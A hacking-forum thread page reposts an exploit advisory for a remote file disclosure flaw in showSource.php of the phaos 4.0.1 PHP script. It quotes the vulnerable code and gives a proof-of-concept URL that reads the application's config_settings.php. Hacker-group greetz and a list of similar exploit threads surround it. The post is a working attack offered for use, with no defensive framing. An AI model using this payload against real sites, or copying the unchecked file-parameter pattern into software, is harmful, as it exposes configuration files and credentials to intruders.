![]() |
|
|
|||||||
| Notices |

Register Now for FREE!
|
![]() |
|
|
LinkBack | Thread Tools | Display Modes |
|
|
#1 (permalink) |
|
Studentz
![]() |
Code:
####################################################################################
}}} Remote File Disclosure Vulnerability {{{
in (showSource.php) phaos4.0.1
MY HOmE : WWW.PAL-HACkEr.COM WWW.ATSDP.COM
####################################################################################
## AUTHOR : HaCkeR_EgY
## My HoMe : www.PaL-HaCker.com & www.ATSDP.com
## ConTacT : hacker_egy@hotmail.com
-----------------------------------------------
## script: phaos4.0.1
##download:http://sourceforge.net/project/showfiles.php?group_id=111506
###################################################################
### vurn C0dE :
## line 16:
showSource($file, $line, $prev, $next); <=====
function showSource($file, $line, $prev = 10, $next = 10) {
if (!(file_exists($file) && is_file($file))) {
return trigger_error("showSource() failed, file does not exist `$file`", E_USER_ERROR);
return false;
}
//read code
## line 35 : ob_start();
highlight_file($file); <<========
$data = ob_get_contents();
ob_end_clean();
## P0C:
http://localhost/[path]/erorr/showSource.php?file=config_settings.php
#################################################################################
## GREETZ TO : My BrOther and My MasTer " Abo Mohamed " ADMIN PAL-HACKER
## Thanx : F0UaD Pr0gRaMeR , FiReSell , MoHamed EL Arab , Mr.exe , zaradusht , and all " pal-hacker members "
#####################################################################################
__________________
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. |
|
|
|
![]() |
| Bookmarks |
| Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | |
| Thread Tools | |
| Display Modes | |
|
|
Similar Threads
|
||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| ChartDirector 4.1 (viewsource.php file) File Disclosure Vuln | Armageddon | Exploit Codes | 0 | 08-08-2008 01:18 PM |
| TRUC 0.11.0 (download.php) Remote File Disclosure Vulnerabil | Armageddon | Exploit Codes | 0 | 08-06-2008 12:11 PM |
| HIOX Browser Statistics 2.0 Remote File Inclusion Vulnerabil | Armageddon | Exploit Codes | 0 | 08-01-2008 02:28 PM |
| Social Site Generator v2 Multiple Remote File Disclosure Vulnerabilities | Armageddon | Exploit Codes | 0 | 06-03-2008 12:52 PM |
| Power Editor 2.0 Remote File Disclosure / Edit Vulnerability | Intruder | Exploit Codes | 0 | 05-21-2008 02:00 AM |